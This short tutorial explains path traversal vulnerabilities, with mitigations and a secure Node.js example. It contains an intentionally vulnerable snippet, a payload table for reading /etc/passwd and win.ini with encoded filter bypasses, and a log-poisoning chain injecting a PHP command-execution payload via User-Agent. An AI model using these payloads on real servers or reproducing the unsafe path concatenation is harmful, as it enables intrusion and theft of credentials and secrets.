Path Traversal Vulnerabilities
/ 2 min read
Updated:Table of Contents
What is Path Traversal?
Path Traversal, also known as Directory Traversal, is a web security vulnerability that allows an attacker to read arbitrary files on the server by manipulating file paths in user input.
How Does It Work?
Many applications allow users to view or download files by specifying their names in a URL parameter, like so:
GET /view?file=report.pdfInternally, the application might be doing something like:
const fs = require("fs");const file = req.query.file;const filePath = "/var/www/files/" + file;fs.readFile(filePath, (err, data) => { res.send(data);});If an attacker changes the value of file to something like ../../../etc/passwd, they can traverse outside the intended directory:
GET /view?file=../../../etc/passwdWhat does ../ mean?
../tells the file system to go one directory up.- Chaining it like
../../../../moves further up in the directory tree.
Windows vs Linux
- Linux system files:
/etc/passwd,/var/log/auth.log - Windows:
C:\Windows\win.ini,C:\boot.ini
Common Attack Payloads
| Payload | Description |
|---|---|
../../../../etc/passwd | Reads Linux password file |
..\..\..\windows\win.ini | Reads Windows config file |
%2e%2e/%2e%2e/%2e%2e/ | URL-encoded traversal |
....//....//....// | Bypass weak filters |
..%c0%af..%c0%afetc/passwd | Unicode-encoded bypass (Apache bug) |
How to Detect Path Traversal
Manual Testing
Check parameters like:
file=path=page=download=doc=
Try payloads:
/view?file=../../../../etc/passwd/view?file=..%2f..%2f..%2fetc%2fpasswd/view?path=....//....//....//.envAutomated Tools
ffuf– fuzz file parametersdirsearch– find hidden pathsferoxbusterLFI Suite– tool for LFI fuzzing
Advanced Attacks (Beyond Path Traversal)
Log Poisoning + LFI → RCE
- Inject PHP code into logs (e.g., via User-Agent header):
User-Agent: <?php system($_GET['cmd']); ?>
- Access log via LFI:
/view?file=../../../../var/log/apache2/access.log&cmd=whoami
Read Application Source Code
/view?file=../../../app/controllers/admin.jsCan reveal:
- Admin routes
- Secrets
- Token names
Mitigations
| Mitigation | Description |
|---|---|
| Input Validation | Block ../, ..\\, encoded traversal, etc. |
| Whitelisting | Only allow filenames from a known safe list |
Use path.resolve() | Canonicalize paths and verify against allowed dir |
| Run App in Jail/Chroot | Restrict file access to a limited area |
| Remove Sensitive Files | No .env, backup.zip, debug.log in prod |
Example: Secure Implementation
const path = require("path");const safeBase = path.resolve("/var/www/files");const requestedPath = path.resolve(safeBase, req.query.file);
if (!requestedPath.startsWith(safeBase)) { return res.status(403).send("Access denied.");}
res.sendFile(requestedPath);TL;DR
| Type | Description | Risk |
|---|---|---|
../../etc/passwd | Read sensitive system files | High |
.git/config | Expose Git repo & dev creds | Critical |
.env | Leak API keys and DB passwords | Critical |
| Log Injection + LFI | Combine to achieve RCE | Critical |